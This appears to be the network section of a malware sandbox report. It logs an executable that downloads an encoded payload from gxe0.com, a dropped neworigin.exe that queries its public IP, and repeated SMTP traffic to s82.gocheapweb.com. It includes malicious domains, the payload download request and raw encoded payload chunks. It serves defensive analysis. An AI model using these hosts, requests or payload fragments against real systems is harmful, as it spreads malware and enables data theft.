Nov 26, 2024 08:17:04.504517078 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.504528999 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.504538059 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.504544973 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.504575014 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.506117105 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506154060 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506167889 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.506234884 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.506246090 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506258011 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506282091 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506304026 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.506350994 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.506392002 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506433964 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506436110 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.506489992 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506524086 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.506525040 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.506541014 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.506587029 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.624706030 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.624720097 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.624851942 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.626549959 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.626703024 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.626722097 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.626880884 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.626882076 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.626983881 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.626990080 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.627095938 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.627134085 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.627219915 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.627262115 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.627329111 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.627352953 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.627435923 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.627463102 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.627567053 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.627578020 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.627696037 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.670964956 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.671092033 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.746021986 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.746705055 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.746853113 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:04.748044014 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.748585939 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.748666048 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.749720097 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.749813080 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.751311064 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.751353979 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.752532959 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.752599001 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.754087925 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.754101038 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.754184961 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.754194021 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.754230976 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.755537033 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.755551100 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.755634069 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.755647898 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.756948948 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.756973028 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.757062912 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.757150888 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.757162094 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.758836985 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.791203976 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.791241884 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.866930962 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.866970062 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.866981983 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.867001057 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:04.867032051 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:05.314277887 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:05.371277094 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:15.501130104 CET	49991	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:15.559118032 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:15.621705055 CET	587	49991	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:15.679199934 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:15.911189079 CET	587	49991	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:15.911947012 CET	49991	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:15.912179947 CET	49994	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:15.977025986 CET	587	49993	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:15.979208946 CET	49993	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:15.979487896 CET	49995	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:16.032066107 CET	587	49994	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:16.035542965 CET	49994	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:16.099551916 CET	587	49995	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:16.103516102 CET	49995	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:17.343338013 CET	587	49994	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:17.364305973 CET	587	49995	51.195.88.199	192.168.2.5
Nov 26, 2024 08:17:17.386888027 CET	49994	587	192.168.2.5	51.195.88.199
Nov 26, 2024 08:17:17.418127060 CET	49995	587	192.168.2.5	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 08:12:59.059267044 CET	52796	53	192.168.2.5	1.1.1.1
Nov 26, 2024 08:12:59.200037956 CET	53	52796	1.1.1.1	192.168.2.5
Nov 26, 2024 08:13:10.313378096 CET	53362	53	192.168.2.5	1.1.1.1
Nov 26, 2024 08:13:10.463644981 CET	53	53362	1.1.1.1	192.168.2.5
Nov 26, 2024 08:13:11.099513054 CET	61546	53	192.168.2.5	1.1.1.1
Nov 26, 2024 08:13:11.244993925 CET	53	61546	1.1.1.1	192.168.2.5
Nov 26, 2024 08:13:14.619626045 CET	57488	53	192.168.2.5	1.1.1.1
Nov 26, 2024 08:13:14.762836933 CET	53	57488	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 08:12:59.059267044 CET	192.168.2.5	1.1.1.1	0xc630	Standard query (0)	gxe0.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:10.313378096 CET	192.168.2.5	1.1.1.1	0xe3ed	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:11.099513054 CET	192.168.2.5	1.1.1.1	0xb942	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:14.619626045 CET	192.168.2.5	1.1.1.1	0x9cc4	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 08:12:59.200037956 CET	1.1.1.1	192.168.2.5	0xc630	No error (0)	gxe0.com	198.252.105.91	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:10.463644981 CET	1.1.1.1	192.168.2.5	0xe3ed	No error (0)	pywolwnvd.biz	54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:11.244993925 CET	1.1.1.1	192.168.2.5	0xb942	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:11.244993925 CET	1.1.1.1	192.168.2.5	0xb942	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:11.244993925 CET	1.1.1.1	192.168.2.5	0xb942	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:14.762836933 CET	1.1.1.1	192.168.2.5	0x9cc4	No error (0)	s82.gocheapweb.com	51.195.88.199	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gxe0.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	198.252.105.91	443	5468	C:\Users\user\Desktop\2jbMIxCFsK.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:00 UTC	161	OUT	GET /yak/233_Wisrysxlfss HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: gxe0.com
2024-11-26 07:13:01 UTC	365	IN	HTTP/1.1 200 OK Connection: close last-modified: Mon, 28 Oct 2024 23:14:08 GMT accept-ranges: bytes content-length: 2562520 date: Tue, 26 Nov 2024 07:13:00 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 Data Ascii: q6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 Data Ascii: s7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f Data Ascii: n7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqO
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d Data Ascii: qKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprm
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 Data Ascii: sLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 Data Ascii: u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKS
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 Data Ascii: q6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6i
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d Data Ascii: nbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm
2024-11-26 07:13:01 UTC	16384	IN	Data Raw: 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 Data Ascii: oKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.26.13.205	443	2140	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:12 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-26 07:13:12 UTC	424	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 07:13:12 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e881316b8a28c81-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2000&rtt_var=759&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1432074&cwnd=252&unsent_bytes=0&cid=0cbaf27f12c74137&ts=451&x=0"
